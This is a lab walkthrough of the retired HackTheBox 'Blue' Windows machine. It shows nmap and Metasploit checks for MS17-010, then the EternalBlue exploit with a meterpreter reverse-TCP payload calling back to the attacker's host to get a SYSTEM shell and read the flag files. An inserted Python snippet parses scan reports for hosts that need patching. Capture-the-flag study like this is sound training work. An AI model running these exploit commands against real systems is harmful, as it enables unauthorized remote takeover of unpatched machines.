Blue HackTheBox WalkThrough

This is a walkthrough of the Blue HackTheBox machine, the 11th machine of our OSCP-like HTB boxes series. In this writeup, I have demonstrated step by step how I rooted the Blue HTB machine. Before starting, let us get to know something about this machine. It is a Windows box with IP address 10.10.10.40 and difficulty low, assigned by its maker.
This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Blue machine by pinging its IP, 10.10.10.40. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap [a port scanner] for this task, and the result is below.
Scanning
$ nmap -sC -sV -oN blue.nmap 10.10.10.40

Nmap revealed that a number of ports are open. Microsoft RPC on port 135, netbios-ssn on port 139 and SMB on port 445 are running. Among all the open ports, only ports 135, 139 and 445 are useful for us because we can enumerate a lot on these ports. We have tools like smbmap, smbclient, enum4linux, rpcclient and more to enumerate these 3 ports.
Before going further with enumeration of SMB shares on port 445, we should not forget to test for the NSA's EternalBlue exploit, which was leaked by the Shadow Brokers hacker group in 2017. For more information about this exploit you should read this Wikipedia article.
So whenever you see that the SMB service is running on port 445 or 135, the first exploit that should come to mind is EternalBlue Doublepulsar, whose details were issued in Microsoft bulletin ms17-010. To check whether this machine is vulnerable to the EternalBlue exploit, there is an nmap script, smb-vuln-ms17-010.nse, and also a Metasploit auxiliary module, auxiliary/scanner/smb/smb_ms17_010, which scan the machine for the ms17-010 patch. You can use either method to check. I have used both methods just to show you the vulnerability.
Checking For ms17-010 Exploit
$ nmap -p 445 10.10.10.40 --script=smb-vuln-ms17-010.nse
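
Added example, not part of the original walkthrough: when the same smb-vuln-ms17-010.nse check is run across several hosts and saved with -oN, a short parser can turn the report into a list of machines that still need the ms17-010 patch. The report text is a constructed, abbreviated sample, the second host is invented, and the function names are hypothetical.

```python
import re

# Constructed sample, abbreviated from the layout of `nmap -oN` output when
# smb-vuln-ms17-010.nse reports a finding; the second host (192.0.2.15) is
# invented to show a host for which the script printed nothing.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.40
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 192.0.2.15
PORT    STATE SERVICE
445/tcp open  microsoft-ds
"""

SCRIPT_HEADER = re.compile(r"^\|[ _]([\w-]+):")  # "| script-name:" line
STATE_LINE = re.compile(r"^\|[ _]\s+State:\s*(\S.*?)\s*$")


def ms17_010_findings(report: str) -> dict:
    """Map every scanned host to the State the script printed, or 'no finding'.

    'no finding' only means the script printed no result; it does not prove
    the host is patched (the probe may have failed to connect).
    """
    findings, host, in_script = {}, None, False
    for line in report.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1].strip("()")  # "name (ip)" or bare ip
            findings[host] = "no finding"
            in_script = False
        elif host is None:
            continue
        elif (m := SCRIPT_HEADER.match(line)):
            in_script = m.group(1) == "smb-vuln-ms17-010"
        elif in_script and (m := STATE_LINE.match(line)):
            findings[host] = m.group(1)
        elif not line.startswith("|"):
            in_script = False  # left the script output block
    return findings


def hosts_to_patch(report: str) -> list:
    """Hosts whose reported state starts with VULNERABLE, sorted for a ticket."""
    return sorted(h for h, s in ms17_010_findings(report).items()
                  if s.startswith("VULNERABLE"))
```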

The Nmap script smb-vuln-ms17-010.nse revealed that the Blue machine is vulnerable to the ms17-010 exploit. Let us check it with Metasploit's auxiliary module auxiliary/scanner/smb/smb_ms17_010 for this vulnerability.
msf5 > search eternalblue
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

The Metasploit module also revealed that it is vulnerable to the ms17-010 exploit. Let us learn something about the ms17-010 exploit. Basically, ms17-010 is an exploit suite which consists of 5 exploits. Among them, the first two are scanners and the last three are exploiters. Since we have confirmed that it is vulnerable to the ms17-010 exploit, any one of the last three exploits can help in getting a shell. I tried the first one and could easily get a user shell.
Getting User Shell
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

So we have got a shell very easily, and with admin privilege too. Now we don't need to escalate privileges because we are already NT AUTHORITY\SYSTEM, which is the highest level of privilege a Windows user has. I think that since this machine was vulnerable to the EternalBlue exploit, that is why it was named Blue by its maker, which is the suffix of EternalBlue. Let's capture the user and root flags.
Capture User Flag
meterpreter > cat "C:\Users\haris\Desktop\user.txt"

Capture Root Flag
meterpreter > cat "C:\Users\Administrator\Desktop\root.txt"

This was how I rooted the Blue HackTheBox machine. This was a very easy box. I hope you have learnt some new things from this walkthrough. Thanks for reading this writeup. For any suggestions and queries related to the walkthrough, feel free to write to us at [email protected].
The next retired machine walkthrough is Nineveh.